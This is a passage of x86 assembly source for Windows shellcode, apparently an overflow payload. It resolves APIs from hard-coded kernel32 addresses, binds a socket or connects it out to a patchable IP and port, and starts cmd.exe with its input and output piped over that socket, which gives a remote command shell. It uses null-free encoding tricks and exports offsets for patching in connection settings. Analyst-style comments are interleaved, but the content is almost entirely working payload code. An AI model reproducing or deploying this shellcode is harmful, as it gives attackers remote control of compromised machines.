call eax;
test eax, eax;
jz _Quit_While_Read_Data_Loop; //WriteFile(..) == 0, 失败,管套中断.
;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
jmp _temp_3;
run_actual6_1:
jmp run_actual6;
_temp_3:
_Read_StdoutPipe:
;//PeekNamedPipe(hReadPipe,NULL,0,NULL,&dwTemp,NULL );
xor eax, eax;
push eax; //NULL
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
push edx; //&dwTemp
push eax; //NULL
push eax; //0
push eax; //NULL
mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];
push eax; //hReadPipe
mov eax, [esi+SkOverflowFuncAddr.PeekNamedPipe];
call eax;
mov eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
test eax, eax;
jz _No_Data_To_Read_Yet;
;//ReadFile( hReadPipe, szTemp, sizeof(szTemp), &dwTemp, NULL)
xor eax, eax;
push eax; //NULL
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
push edx; //&dwTemp
mov al, SIZE_OF_TEMP_BUFFER;
push eax; //sizeof(szTemp);
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
push edx; //szTemp;
mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];
push eax; //hReadPipe
mov eax, [esi+SkOverflowFuncAddr.ReadFile];
call eax; //ReadFile.
;//if( ReadFile (...) == 0)? then quit.
test eax, eax;
je _Quit_While_Read_Data_Loop;
;//send( newsocket, szTemp, dwTemp, 0);
xor eax, eax;
push eax; //0
mov eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
push eax; //dwTemp;
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
push edx; //szTemp;
mov eax, [edi+Shell_Cmd_Pipe.msocket];
push eax; //socket.
mov eax, [esi+SkOverflowFuncAddr.send];
call eax;
cmp eax, -1;
je _Quit_While_Read_Data_Loop;
jmp _Read_StdoutPipe; //continue to read next data.
_No_Data_To_Read_Yet:
jmp _While_Read_Data_Loop;
_Quit_While_Read_Data_Loop:
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
;//Jump island: reached from run_actual6_1 (above) and hopping on to run_actual.
;//The author's note near _temp_3 explains these islands: they keep every jmp
;//within a short displacement so the encoded jump never contains a 0 byte.
run_actual6:
jmp run_actual;
;//BOOL _Create_Two_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
;//Creates the two anonymous pipes that later carry the child's stdout and stdin.
;//In:   FUNC_PARAM_1 = pFuncAddr (table of resolved API addresses; only .CreatePipe is used here)
;//      FUNC_PARAM_2 = pCmdPipe  (receives hReadPipe/ShellStdoutPipe and ShellStdinPipe/hWritePipe)
;//      FUNC_PARAM_1/2 are argument macros defined outside this view.
;//Out:  eax = 1 when both CreatePipe calls succeed, 0 as soon as either returns 0.
;//Locals: a SECURITY_ATTRIBUTES at [ebp-10h] with bInheritHandle = TRUE, so the
;//      process started afterwards inherits all four pipe handles.  From an
;//      analyst's point of view this is the visible artifact: a child with
;//      inherited pipe handles spawned by the process that runs this code.
;//Frame: 0F0h bytes of locals; esi/edi/edx/ecx/ebx are saved and restored.
_Create_Two_Pipe:
push ebp;
mov ebp, esp;
xor eax, eax;
mov al, 0f0h;
sub esp, eax; //reserve 0F0h bytes of locals (size goes through al, presumably so the encoding holds no 0 bytes)
push esi;
push edi;
push edx;
push ecx;
push ebx;
mov esi, FUNC_PARAM_1; //esi = pFuncAddr
mov edi, FUNC_PARAM_2; //dead load: edi is overwritten by the next lea and reloaded from FUNC_PARAM_2 before each CreatePipe
xor ebx,ebx;
lea edi, [ebp-10h]; //edi = &SecurityAttributes (local)
;//SecurityAttributes.lpSecurityDescriptor = NULL; //default ACL
lea edx, [edi+SECURITY_ATTRIBUTES.lpSecurityDescriptor];
mov [edx], ebx;
;//SecurityAttributes.bInheritHandle = TRUE; //will inherit handle
lea edx, [edi+SECURITY_ATTRIBUTES.bInheritHandle];
inc ebx; //ebx = 1 = TRUE
mov [edx], ebx;
;//SecurityAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
lea edx, [edi+SECURITY_ATTRIBUTES.nLength];
mov bl, size SECURITY_ATTRIBUTES; //only bl is written; ebx was 1, so ebx now equals the struct size
mov [edx], ebx;
xor ebx, ebx;
;//bResult = CreatePipe( &hReadPipe, &ShellStdoutPipe, &SecurityAttributes, 0);output into _FUNC_PARAM_2's variables.
;//Pipe 1: child's stdout write end (ShellStdoutPipe) and our read end (hReadPipe).
push edi; //save &SecurityAttributes across the call (edi is repurposed below)
push ebx; //0 (nSize: default buffer)
push edi; //&SecurityAttributes
mov edi, FUNC_PARAM_2; //edi = pCmdPipe
lea edx, [edi+Shell_Cmd_Pipe.ShellStdoutPipe];
mov [edx], ebx; //ShellStdoutPipe = 0;
push edx; //&ShellStdoutPipe (hWritePipe out-param)
lea edx, [edi+Shell_Cmd_Pipe.hReadPipe];
push edx;; //&hReadPipe (hReadPipe out-param)
mov eax, [esi+SkOverflowFuncAddr.CreatePipe];
call eax; //stdcall: callee removes the 4 args, no add esp here
pop edi; //restore &SecurityAttributes
test eax, eax;
je _Create_Pipe_Quit_Error;
;//Create Second Pipe.
;//CreatePipe( &ShellStdinPipe, &hWritePipe, &SecurityAttributes, 0);
;//Pipe 2: child's stdin read end (ShellStdinPipe) and our write end (hWritePipe).
xor ebx, ebx;
push ebx; //0 (nSize)
push edi; //&SecurityAttributes
mov edi, FUNC_PARAM_2; //edi = pCmdPipe (not restored afterwards; edi is popped at exit anyway)
lea edx, [edi+Shell_Cmd_Pipe.hWritePipe];
push edx; //&hWritePipe (hWritePipe out-param)
lea edx, [edi+Shell_Cmd_Pipe.ShellStdinPipe];
mov [edx],ebx; //ShellStdinPipe = 0;
push edx; //&ShellStdinPipe (hReadPipe out-param)
mov eax, [esi+SkOverflowFuncAddr.CreatePipe];
call eax;
test eax, eax;
je _Create_Pipe_Quit_Error;
xor eax, eax;
inc eax; //return TRUE (1) without a 0-containing immediate
jmp _Create_Pipe_Quit;
_Create_Pipe_Quit_Error:
xor eax, eax; //return FALSE (0)
jmp _Create_Pipe_Quit;
nop; //padding; never executed
_Create_Pipe_Quit:
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
;//run_actual: main body of the payload, reached through the jump islands above.
;//Sequence: locate the data block appended after the code (return address on
;//the stack + MyDataOffset), copy it to the stack, turn the '+'-padded API
;//name table into NUL-terminated strings, resolve the imports through the
;//hard-coded GetModuleHandleA/GetProcAddress addresses, open a socket
;//(listen or connect, per the author's comment), create two pipes, start
;//"cmd.exe" with its stdio on those pipes, relay socket<->pipe, then
;//TerminateProcess the child and ExitProcess the current process.
;//Register roles: esi = SkOverflowFuncAddr* once the resolver has run,
;//edi = Shell_Cmd_Pipe* once the socket exists.  ebp is inherited from the
;//code that entered this label -- it is not set up here (TODO confirm where).
;//Every callee here is cleaned up by the caller (add esp, N after each call).
run_actual:
lea esi, [esp];
mov esi, [esi]; //esi = value on top of the stack: presumably the return address pushed by the call at call_back_Data_Offset (the author's comment says ebx, but esi is the register used)
xor ecx, ecx;
mov cx,MyDataOffset;
add esi, ecx; //esi = address of the data block appended after the code
;//At ebp-0x2ff lives the szShellNeedFunc structure (stack copy of the data block).
lea edi, [ebp - szShellNeedFunc_OFFSET];
push edi;
;//MyDebugAdd -----
mov cx, _size_AllData; //ecx high word is still 0 from the xor above
rep movsb; //copy the whole data block (connect info + strings + addresses) onto the stack
;//The copy also covers the connect-info structure's data.
pop edi;
push edi;
;//Convert '+' to "\x00": the stored strings use '+' where NUL terminators belong.
;//void _Convert_Add_Sign_To_Null_Sign(void *ptr, int iLen, DWORD dwOld, DWORD dwNew);
xor ecx, ecx;
push ecx; //---arg 4: dwNew = 0
mov cl, '+';
push ecx; //---arg 3: dwOld = '+'
mov cx, _size_szShellNeedFunc;
push ecx; //---arg 2: iLen
xor ebx, ebx;
mov bl, String_Of_Data_Offset;
add edi, ebx; //edi now points at the real szShellNeedFunc (the "cmd.exe" string)
push edi; //---arg 1: ptr
call _Convert_Add_Sign_To_Null_Sign;
add esp, 10h; //caller cleans up the 4 args
;//Resolve the SkOverflowFuncAddr table from the names in szShellNeedFunc.
;//void _Get_Overflow_Addr_From_Shell_Func( SkOverflowFuncAddr *pSkOverflowFuncAddr, char *ShellNeedFuncStr, DWORD dwGetModuleHandleAddr, DWORD GetProcAddr)
xor ecx, ecx;
mov cx, _GetModuleHandle_Addr_Offset;
mov esi, edi;
add esi, ecx; //esi = &GetModuleHandleA_Addr in the stack copy; GetProcAddressA_Addr is the next dword
mov eax, [esi+4]
push eax; ;//GetProcAddress_Addr (hard-coded in the data block)
mov eax, [esi];
push eax; ;//GetModuleHandle_Addr (hard-coded in the data block)
push edi; //ShellNeedFuncStr
;//At ebp-0x1ff lives the SkOverflowFuncAddr structure.
lea esi, [ebp-SkOverflowFuncAddr_OFFSET];
push esi; //pSkOverflowFuncAddr (output table)
call _Get_Overflow_Addr_From_Shell_Func;
add esp, 10h;
pop edi; //edi = base of the stack copy (szShellNeedFunc area)
;//Create a socket: listen on a port / connect to an ip:port, and return that socket.
;//SOCKET _Create_Bind_Connect_Socket_To_Port( SkOverflowFuncAddr *pFuncAddr, szShellNeedFunc *pNeedFunc);
push edi; //pNeedFunc
push esi; //pFuncAddr
call _Create_Bind_Connect_Socket_To_Port;
add esp, 8;
test eax, eax;
jz Main_Quit_Now; //socket creation failed.
lea edi, [ebp-Shell_Cmd_Pipe_OFFSET]; //edi = Shell_Cmd_Pipe* (local) from here on
lea ebx, [edi + Shell_Cmd_Pipe.msocket];
mov [ebx], eax; //store the socket in msocket.
;//BOOL _Create_Two_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
;//Create the 2 pipes used to bind the shell.
push edi;
push esi;
call _Create_Two_Pipe;
add esp, 8;
test eax, eax;
jz Main_Quit_Now;
;//now is ok.
;//Run the process pStrCmd with its stdio on the pipes;
;//_Create_Process_To_Handle( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe, LPCTSTR *pStrCmd);
lea edi, [ebp-szShellNeedFunc_OFFSET];
xor eax,eax;
mov al, String_Of_Data_Offset; //offset of the cmd.exe command line within the data.
add edi, eax;
push edi; //pointer to "cmd.exe" (NUL-terminated after the '+' conversion)
lea edi, [ebp-Shell_Cmd_Pipe_OFFSET];
push edi; //pCmdPipe
push esi; //pFuncAddr
call _Create_Process_To_Handle;
add esp, 0ch; //NOTE: the return value is not checked; the relay below runs even if the process was not created
;//Receive data from the socket, write it into the pipe, read the pipe, send to the socket.
;//_Recv_Write_Socket_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
push edi;
push esi;
call _Recv_Write_Socket_Pipe;
add esp, 8;
;//Close the pipes that are no longer needed
;//_Close_All_Communication_Pipe(SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
push edi;
push esi;
call _Close_All_Communication_Pipe
add esp, 8;
;//Kill the child process: TerminateProcess(ProcessInformation.hProcess, 0)
xor eax, eax;
push eax; //uExitCode = 0
lea edx, [edi+Shell_Cmd_Pipe.ProcessInformation];
mov eax, [edx+PROCESS_INFORMATION.hProcess];
push eax; //hProcess
mov eax, [esi+SkOverflowFuncAddr.TerminateProcess];
call eax;
Main_Quit_Now: ;//exit now.. (also the target of the two failure jumps above; esi must still hold SkOverflowFuncAddr* here)
;//exit now.
xor eax, eax;
push eax; //uExitCode = 0
mov eax, [esi+ SkOverflowFuncAddr.ExitProcess];
call eax; //ExitProcess(0): ends the process hosting this code; does not return
ret; //unreachable
;//quit_return:
;//restore the stack -- dead code: nothing jumps here and ExitProcess above never returns
mov esp,ebp;
pop ebp;
nop;
nop;
;//Data block appended after the code.  run_actual copies all of it
;//(_size_AllData bytes from MyConnectInfo) onto the stack before use.
MyDataOffset equ $-call_back_Data_Offset; //distance from the call at call_back_Data_Offset to here; added to the popped return address in run_actual
ConnectTypeOffset equ $-start; //offsets from `start`; exported by _GetDataSetOffset_Value so the embedding program can patch the fields below
ListenPortOffset equ ConnectTypeOffset+stConnectInfo.dwListenPort;
ConnectIP1Offset equ ConnectTypeOffset+stConnectInfo.dwIP1;
ConnectIP2Offset equ ConnectTypeOffset+stConnectInfo.dwIP2;
ConnectPortOffset equ ConnectTypeOffset+stConnectInfo.dwConnectPort;
;//Connection parameters.  stConnectInfo is declared outside this view; the
;//initialiser values look like placeholders that the embedding program
;//overwrites through the offsets above -- TODO confirm against the host code.
MyConnectInfo stConnectInfo < 2, 0ffh, 0ffffh, 02010151h, 01250201h, 01a801c0h, 02010158h>
String_Of_Data_Offset equ $-MyConnectInfo; //offset of the string area relative to MyConnectInfo
ExecCommandOffset equ $-start;
;//Command line for the child process, '+'-padded to 128 bytes.  Every '+' in the
;//string area is rewritten to 0 at run time by _Convert_Add_Sign_To_Null_Sign
;//(see run_actual), so the strings are stored without 0 bytes yet end up NUL-terminated.
szShellNeedFunc db 'cmd.exe+++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
;//Import table consumed by _Get_Overflow_Addr_From_Shell_Func.  As laid out in the
;//bytes: a DLL count, then per DLL a length-prefixed name followed by a function
;//count and length-prefixed function names.  Each length byte counts the name plus
;//the '+' byte(s) that follow it (e.g. 0bh for 'WriteFile', '++').
SHELL_NEED_FUNC_BODY_OFFSET equ $-szShellNeedFunc;//offset of the import table from szShellNeedFunc (the 128-byte command-line area)
db 02h ;//2 DLLs follow
db 0eh, 'kernel32.dll+', '+'
db 0eh ;//14 kernel32 functions follow
db 11h, 'TerminateProcess', '+'
db 0bh, 'CreatePipe', '+'
db 10h, 'GetStartupInfoA', '+'
db 0fh, 'CreateProcessA', '+'
db 0eh, 'PeekNamedPipe', '+'
db 0ch, 'GlobalAlloc', '+'
db 0bh, 'WriteFile', '++'
db 09h, 'ReadFile', '+'
db 06h, 'Sleep', '+'
db 0ch, 'ExitProcess', '+'
db 0eh, 'GetLastError+', '+'
db 10h, 'DuplicateHandle', '+'
db 12h, 'GetCurrentProcess', '+'
db 0ch, 'CloseHandle','+'
db 0bh, 'ws2_32.dll', '+'
db 0bh ;//11 ws2_32 functions follow
db 07h, 'socket', '+'
db 05h, 'bind', '+'
db 07h, 'listen', '+'
db 07h, 'accept', '+'
db 05h, 'send', '+'
db 05h, 'recv', '+'
db 0bh, 'setsockopt', '+'
db 0bh, 'WSAStartup', '+'
db 0ch, 'closesocket', '+'
db 08h, 'connect', '+'
db 0ch, 'gethostname', '+'
db '+++++++++++++++++++++' ;//padding after the table
;//Resolver addresses, read by run_actual at _GetModuleHandle_Addr_Offset and +4.
;//These are absolute kernel32 export addresses, presumably valid for one specific
;//OS build only; on any other build the resolver call lands elsewhere.
_GetModuleHandle_Addr_Offset equ $-szShellNeedFunc
GetModuleHandleOffset equ $-start;
GetModuleHandleA_Addr dd 77e756dbh
GetProcAddressOffset equ $-start;
GetProcAddressA_Addr dd 77e7564bh
_size_szShellNeedFunc equ $-szShellNeedFunc+1 ;//length passed to _Convert_Add_Sign_To_Null_Sign
_size_AllData equ $-MyConnectInfo+1 ;//byte count for the rep movsb in run_actual
_sk_Bind_ConnectShellCode endp
db '---------------------------------------------------------'
;//Offsets of the important (patchable) data within the code.
;//Filled in by _GetDataSetOffset_Value; every value is a byte offset from `start`,
;//so the embedding program knows where in the raw payload bytes to write the
;//connection parameters and the resolver addresses.
stDataSetOffset struct
dwConnectType DD 0; //offset of MyConnectInfo (ConnectTypeOffset)
dwListenPort DD 0; //offset of stConnectInfo.dwListenPort (ListenPortOffset)
dwConnectIP1 DD 0; //offset of stConnectInfo.dwIP1 (ConnectIP1Offset)
dwConnectIP2 DD 0; //offset of stConnectInfo.dwIP2 (ConnectIP2Offset)
dwConnectPort DD 0; //offset of stConnectInfo.dwConnectPort (ConnectPortOffset)
dwExecCommand DD 0; //offset of the szShellNeedFunc command line (ExecCommandOffset)
wSizeExecCommand DW 0; //set to SHELL_NEED_FUNC_BODY_OFFSET; presumably the room available for the command line
wReserv1 DW 0 ;//padding; in _GetDataSetOffset_Value it receives the high word of a 32-bit store aimed at wSizeExecCommand
dwGetModuleHandle DD 0; //offset of GetModuleHandleA_Addr (GetModuleHandleOffset)
dwGetProcAddress DD 0; //offset of GetProcAddressA_Addr (GetProcAddressOffset)
stDataSetOffset ends
;//void _GetDataSetOffset_Value( stDataSetOffset *pOut );
;//In:  FUNC_PARAM_1 = pOut (argument macro defined outside this view)
;//Fills *pOut with the offsets, relative to `start`, of the patchable fields of
;//the payload (connection parameters, command line, resolver addresses).
;//All general registers are preserved, eax included; there is no return value.
_GetDataSetOffset_Value proc
push ebp;
mov ebp, esp;
push esi;
push edi;
push edx;
push ecx;
push ebx;
push eax;
mov esi, FUNC_PARAM_1; //esi = pOut
lea edi, [esi+stDataSetOffset.dwConnectType];
mov eax, ConnectTypeOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwListenPort];
mov eax, ListenPortOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwConnectIP1];
mov eax, ConnectIP1Offset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwConnectIP2];
mov eax, ConnectIP2Offset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwConnectPort];
mov eax, ConnectPortOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwExecCommand];
mov eax, ExecCommandOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.wSizeExecCommand];
mov ax, SHELL_NEED_FUNC_BODY_OFFSET; //only ax is written; the high word of eax still holds the high word of ExecCommandOffset
mov [edi], eax; //NOTE(review): 32-bit store into the 16-bit wSizeExecCommand field -- the stale high word spills into wReserv1, which nothing in this file reads, so it is harmless here; a WORD store (mov [edi], ax) would be the correct width
lea edi, [esi+stDataSetOffset.dwGetModuleHandle];
mov eax, GetModuleHandleOffset;
mov [edi], eax;
lea edi, [esi+stDataSetOffset.dwGetProcAddress];
mov eax, GetProcAddressOffset;
mov [edi], eax;
pop eax;
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
_GetDataSetOffset_Value endp
end